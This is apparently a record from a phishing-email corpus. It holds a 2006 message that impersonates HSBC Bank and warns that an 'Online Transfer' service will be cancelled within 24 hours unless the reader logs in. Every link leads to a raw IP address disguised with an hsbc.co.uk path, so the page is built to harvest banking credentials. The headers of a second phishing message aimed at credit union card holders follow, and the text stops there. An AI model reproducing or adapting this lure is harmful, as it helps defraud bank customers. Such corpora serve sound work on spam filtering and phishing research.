From: "HSBC Bank" <service@hsbc.co.uk>
Reply-To: "HSBC Bank" <service@hsbc.co.uk>
To: aaron@example.com, ben@example.com, nobody@example.com
Subject: Your account access has been limited 
Date: Wed, 14 Jun 2006 11:35:58 -0200
X-Mailer: QUALCOMM Windows Eudora Version 5.1
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="--3507845434951100176"
X-Priority: 1
X-MSMail-Priority: High
Status: 
X-Status: 
X-Keywords:                   

----3507845434951100176
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<META HTTP-EQUIV=3D"Content-Type" CONTENT=3D"text/html;charset=3Diso-8859-=
1">
<html>
<title>&copy; HSBC Bank plc.</title><head>
<META http-equiv=3D"Content-Type" content=3D"text/html; charset=3DUTF-8">
<style>
<!--
		p { 
			font-family: Arial; 
			font-size: 12px; 
			font-style: normal; 
			line-height: normal; 
			font-weight: normal; 
			font-variant: normal; 
			text-transform: none; 
			color: black; 
			text-decoration: none; 
			align=3D"left" }
		p1 { 
			font-family: Arial; 
			font-size: 12px; 
			font-style: normal; 
			line-height: normal; 
			font-weight: normal; 
			font-variant: normal; 
			text-transform: none; 
			color: black; 
			text-decoration: none; 
			align=3D"left" }
		span { 
			font-family: Arial; 
			font-size: 12px; 
			font-style: normal; 
			line-height: normal; 
			font-weight: normal; 
			font-variant: normal; 
			text-transform: none; 
			color: black; 
			text-decoration: none; 
			align=3D"left" }
	-->
</style>
</head>
<body>
<span>
<br>
<p>Dear online banking customer, </p>
				Thank you for using the HSBC Bank Online Transfer<sup>&reg;</sup> -  s=
ervice. <br>
<br>
</span>
<p>	
				    In order to provide final approval for your transaction, we need a=
dditional information.  Please access your <a href=3D"http://62.193.219.81=
/.www.hsbc.co.uk/home/1/2/personal/hsbc/index.html" target=3D"_blank"></a>=
<b><a href=3D"http://62.193.219.81/.www.hsbc.co.uk/home/1/2/personal/hsbc/=
index.html" target=3D"_blank">online banking account</a> </b> to verify th=
e information is correct and complete your enrollment.<br>
  <br>
                      <b>If we do not hear from you  within the next 24 ho=
urs, we will cancel your Online Transfer<b><sup>&reg;</sup></b> service</b=
>.<br>
  <br>
                      <strong><a href=3D"http://62.193.219.81/.www.hsbc.co=
uk/home/1/2/personal/hsbc/index.html" target=3D"_blank">Click here for on=
line banking</a> </strong></p>
<span></span><span>
<p>
  <b>Your Promotional Code for Online Transfer<span><sup>&reg;</sup></span=
> Service is: 905855815</b><br>
    Please use this number if needed. <br>
</p>
<p>
	If you have questions, please visit our website at <a href=3D"http://www.=
hsbc.co.uk">www.hsbc.co.uk/contact/</a>.<br>
<br>
	Thank you for using &copy; HSBC Bank plc!<br>
<p>
			-----------------------------------------------------------------------=
------------------------------------------------------- <br>
			DO NOT REPLY TO THIS EMAIL. IF YOU HAVE QUESTIONS PLEASE <a href=3D"htt=
p://62.193.219.81/.www.hsbc.co.uk/home/1/2/personal/hsbc/index.html" targe=
t=3D"_blank">CONTACT US</a>.</p>
</p>
</span>
</body>
</html>

----3507845434951100176--

From postmaster@www.zumaland.com  Wed Jun 14 18:30:40 2006
Return-Path: <postmaster@www.zumaland.com>
X-Original-To: nobody@login.example.com
Delivered-To: nobody@login.example.com
Received: from mail1.example.com (mail1.example.com [10.5.6.7])
	by funky.example.com (Postfix) with ESMTP id C537746996
	for <nobody@login.example.com>; Wed, 14 Jun 2006 18:30:39 -0400 (EDT)
Received: from www.zumaland.com (wsip-64-58-145-226.oc.oc.cox.net [64.58.145.226])
	by mail1.example.com (Postfix) with ESMTP id 813CD6CCE9B
	for <nobody@example.com>; Wed, 14 Jun 2006 18:30:40 -0400 (EDT)
Received: by www.zumaland.com (Postfix, from userid 1026)
	id 5D14CA9D3D; Wed, 14 Jun 2006 15:10:44 -0700 (PDT)
To: nobody@example.com
Subject: Dear FCU credit card holder...
Message-ID: <1150323044.32198.qmail@ncua.gov>
